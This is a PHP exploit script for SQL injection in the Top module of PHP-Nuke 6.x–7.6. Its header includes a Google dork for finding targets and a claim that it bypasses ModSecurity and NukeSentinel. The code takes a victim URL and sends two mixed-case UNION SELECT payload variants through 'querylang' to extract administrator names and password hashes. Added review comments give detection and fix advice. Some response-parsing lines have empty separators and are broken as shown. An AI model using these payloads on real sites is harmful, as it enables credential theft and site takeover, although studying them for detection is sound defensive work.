# Exploit Title: PHP-Nuke ( SQL injection Top Module + protection Bypass )
# Google Dork: intext: Powered by PHP-Nuke
# Date: 2024-10-07
# Exploit Author: Emiliano Febbi
# Vendor Homepage: https://phpnuke.org/
# Software Link: https://sourceforge.net/projects/phpnuke/files/phpnuke/
# Version: 6.x < 7.6
# Tested on: Windows 10
[code] ->New concept of exploit writing, CMS protections are useless. ->Very fast usage.
PHP-Nuke SQL injection / Bypass Protections
new exploit concept
######################################################################
#This exploit is for Top Module of PHP-Nuke 6.x < 7.6 #
#auto-bypass *illegal operation* , *mod security* , *NukeSentinel* #
#allowed http and https protocols. Code by Emiliano Febbi #
######################################################################
';
/*
 * Review notes (defensive reading of this listing).
 *
 * Flow: runs only when the POST field 'victim' is truthy. Its value becomes
 * $site and is interpolated, unvalidated, into every URL fetched below;
 * 'exploit_nuke' selects one of two request variants ("one" / "two").
 *
 * All traffic is generated server-side through file() / file_get_contents(),
 * so it relies on PHP's URL fopen wrappers being enabled on the host that
 * runs this page. Because $site is never checked, the page also acts as an
 * open fetch proxy for whoever can POST to it; it should not be left
 * reachable on a shared or public web root.
 *
 * What a target's access log would show: GET requests for admin.php and
 * modules.php?name=Top, followed by GETs to modules.php?name=Top carrying a
 * 'querylang' parameter with a UNION SELECT against nuke_authors (columns
 * 'aid' and 'pwd').
 *
 * NOTE(review): the affected range given in the page header is 6.x < 7.6;
 * nothing in this block checks the target's version.
 */
if($_POST['victim']) {
$site = $_POST['victim'];
$j = $_POST['exploit_nuke'];
switch ($j) { /*#method1*/
case "one":
/*#Get info from victim site*/
/* Reachability probes only: file() returns false when the URL cannot be
   fetched, so these branches just report whether admin.php and the Top
   module answered. */
if (false!==file("$site/admin.php")) echo "~Admin Login Found!
";
else echo "~missing Admin Login
";
if (false!==file("$site/modules.php?name=Top")) echo "#Top Module Active!
";
else echo "#Top Module not Active!
";
print '--------------------------------------
';
/*#Get user1*/
print "#user1:
";
/* Variant one request: 'querylang' carries mixed-case UNION/SELECT keywords
   separated by %23xyz%0A (a '#' comment followed by a line feed) and reads
   'aid' from nuke_authors. For detection, URL-decode the parameter, strip SQL
   comments and case-fold it before matching. The durable fix is server-side:
   'querylang' is presumably a language selector and should be checked
   against the installed language names - confirm against the module source. */
$content_user=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,aid,1,1%20FROM%20nuke_authors--");
/* NOTE(review): both explode() separators are empty in this copy of the
   listing (the original delimiters apparently did not survive extraction).
   explode() rejects an empty separator: warning and false before PHP 8.0,
   ValueError from 8.0 on. The same applies to every explode() pair below.
   The separators are deliberately not reconstructed here. */
$comment_user=explode('',$content_user);
$comment_user=explode("",$comment_user[1]);
/* strip_tags() removes markup from the extracted fragment; var_dump() prints
   it with its type and length. */
var_dump(strip_tags($comment_user[0]));
echo "
";
/*#Get pwd1*/
print "#password1:
";
/* Same request shape, selecting 'pwd' instead of 'aid'. A logged request of
   this form that returned a normal page means the stored administrator
   credentials should be treated as exposed and rotated. */
$content=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,pwd,1,1%20FROM%20nuke_authors--");
$comment=explode('',$content);
$comment=explode("",$comment[1]);
var_dump(strip_tags($comment[0]));
echo "
";
/*#Get user2*/
print "#user2:
";
/* Byte-identical URL to the user1 request; only the index taken from the
   split response differs ([2] instead of [1]). */
$content_user2=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,aid,1,1%20FROM%20nuke_authors--");
$comment_user2=explode('',$content_user2);
$comment_user2=explode("",$comment_user2[2]);
var_dump(strip_tags($comment_user2[0]));
echo "
";
/*#Get pwd2*/
print "#password2:
";
/* Byte-identical URL to the password1 request; index [2] of the split. */
$content2=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,pwd,1,1%20FROM%20nuke_authors--");
$comment2=explode('',$content2);
$comment2=explode("",$comment2[2]);
var_dump(strip_tags($comment2[0]));
echo "
";
break;
/*###################################################################################################################################*/
case "two": /*#method2*/
/*#Get info from victim site*/
/* Same two reachability probes as in case "one". */
if (false!==file("$site/admin.php")) echo "~Admin Login Found!
";
else echo "~missing Admin Login
";
if (false!==file("$site/modules.php?name=Top")) echo "#Top Module Active!
";
else echo "#Top Module not Active!
";
print '--------------------------------------
';
/*#Get user1*/
print "#user1:
";
/* Variant two request: the keywords are again mixed-case but separated by
   %0D%0A (CR LF) with no inline comment, and there is no leading WHERE
   clause. A rule that matches on the decoded, whitespace-collapsed,
   case-folded 'querylang' value covers both variants; a rule keyed to one
   literal spelling covers neither reliably. */
$content_userj=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,aid,0,0+from+nuke_authors--");
$comment_userj=explode('',$content_userj);
$comment_userj=explode("",$comment_userj[1]);
var_dump(strip_tags($comment_userj[0]));
echo "
";
/*#Get pwd1*/
print "#password1:
";
/* Same request shape, selecting 'pwd' instead of 'aid'. */
$content_userp=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,pwd,0,0+from+nuke_authors--");
$comment_userp=explode('',$content_userp);
$comment_userp=explode("",$comment_userp[1]);
var_dump(strip_tags($comment_userp[0]));
echo "
";
/*#Get user2*/
print "#user2:
";
/* Byte-identical URL to this variant's user1 request; index [2] of the
   split. */
$content_userz=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,aid,0,0+from+nuke_authors--");
$comment_userz=explode('',$content_userz);
$comment_userz=explode("",$comment_userz[2]);
var_dump(strip_tags($comment_userz[0]));
echo "
";
/*#Get pwd2*/
print "#password2:
";
/* Byte-identical URL to this variant's password1 request; index [2] of the
   split. */
$content_userq=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,pwd,0,0+from+nuke_authors--");
$comment_userq=explode('',$content_userq);
$comment_userq=explode("",$comment_userq[2]);
var_dump(strip_tags($comment_userq[0]));
echo "
";
break;
};;
};;;
?>
[/code]